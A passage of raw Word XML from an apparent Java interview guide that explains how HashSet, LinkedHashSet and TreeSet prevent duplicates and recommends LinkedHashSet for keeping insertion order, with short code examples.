      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in addition to the hash table to store elements in the order in which they were inserted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789342E9" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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Like HashSet, it still ensures that there are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no duplicates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but it also allows you to iterate over the elements in the order they were added.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447AE705" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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reeSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FD924B" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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TreeSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is backed by a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Red-Black Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is a balanced tree structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE21B2A" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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stores elements in a sorted order according to their natural ordering or based on a comparator passed at the time of creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303904E2" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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uplicates are not allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because the tree structure ensures that only unique elements (based on the compareTo() method or the comparator) are stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167D17CA" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005F393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0B15769">
          <v:rect id="_x0000_i1483" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58065103" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393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a Set (HashSet) with No Duplicates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055EB583" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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HashSet;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6618C4" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D0D730" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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etExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC514A" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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1D27394F" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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e a HashSet of integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CE52BC" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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HashSet&lt;Integer&gt; set = new HashSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A48B143" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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1C555AB" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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dding elements to the Set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A74648E" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E42507B" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51168807" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686D4C6F" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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10);  // Duplicate, will not be added</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441A1AA3" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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40);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387CB0AA" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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2922E3F" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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nting the Set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D04DB1C" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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et: " + set);  // Output will be [10, 20, 30, 40] (no duplicates)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E56B22B" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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EFDCBCC" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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9804971" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393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p w14:paraId="798E6976" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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t: [10, 20, 30, 40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6770C5E8" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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s you can see, even though we tried to add the number 10 twice, the Set only stores one copy of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6540CD" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005F393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3E7346B7">
          <v:rect id="_x0000_i1484" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0373EB6B" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111B0D90" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71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Duplicates:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A Set does not allow duplicate values because it uses either a hash table or tree structure to ensure uniqueness based on hashCode() and equals() (for HashSet) or compareTo()/Comparator (for TreeSet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E40ECC" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71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fficiency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The time complexity for add(), remove(), and contains() in a HashSet is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on average) because of hashing, while the operations in TreeSet are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>O(log n)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to the tree structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29189EDF" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71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 of hashCode() and equals() (in HashSet)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The hashCode() method is used to determine the hash bucket, and if multiple elements fall into the same bucket (hash collision), the equals() method is used to check if the element is already present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3093A708" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005F393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76C9FB6">
          <v:rect id="_x0000_i1485" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7BA577" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393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41878B9D" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> prevents duplicates because it relies on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashing mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for HashSet) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sorted ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for TreeSet) to maintain unique elements. It internally checks if an element already exists before adding it, using either </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash code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equals method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in HashSet) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>comparator methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in TreeSet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1D4E12" w14:textId="23F16A0E" w:rsidR="00432EDD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393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et me know if you'd like more details or examples!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC02C67" w14:textId="5D5E764C" w:rsidR="00432EDD" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00432ED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29BC842">
          <v:rect id="_x0000_i1486" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DFF10E" w14:textId="77777777" w:rsidR="00322962" w:rsidRPr="00CE4B95" w:rsidRDefault="00322962">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="_Toc196307624"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which collection you will use in order to remove duplicate elements and preserve the insertion order?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>
    </w:p>
    <w:p w14:paraId="50FA26FE" w14:textId="0FC8D4AB" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C56">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o remove duplicate elements and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>preserve the insertion order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java, you should use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LinkedHashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B6BB56" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C5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y LinkedHashSet?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283D9CA6" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71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moves Duplicates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Like other Set implementations, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LinkedHashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatically eliminates duplicate elements because it doesn't allow duplicates by design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAF4DF1" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71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eserves Insertion Order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Unlike HashSet, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LinkedHashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> maintains the order in which elements were inserted into the set. This is achieved by using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to maintain the insertion order in addition to the underlying hash table for efficient lookups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064DF4E4" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C5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Using LinkedHashSet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B8763D" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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nkedHashSet;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9CF0D3" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C56">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71CFD9CB" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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LinkedHashSetExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE3266C" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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1E45E9CF" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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e a LinkedHashSet of integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B27653D" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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nkedHashSet&lt;Integer&gt; set = new LinkedHashSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3163DA75" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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EC099BC" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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dding elements to the LinkedHashSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD6BC55" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5203C618" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D36FEA" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B79651C" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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10);  // Duplicate, will not be added</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B28BBD1" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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40);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B9EFD5" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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C328CFA" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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nting the LinkedHashSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A57416B" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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LinkedHashSet: " + set);  // Output will be [10, 20, 30, 40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20755D3F" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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186F647" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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1A2EB11" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C5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p w14:paraId="2220CCE2" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C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nkedHashSet: [10, 20, 30, 40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F60CE8B" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C5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Points:</w:t>
      </w:r>
    </w:p>
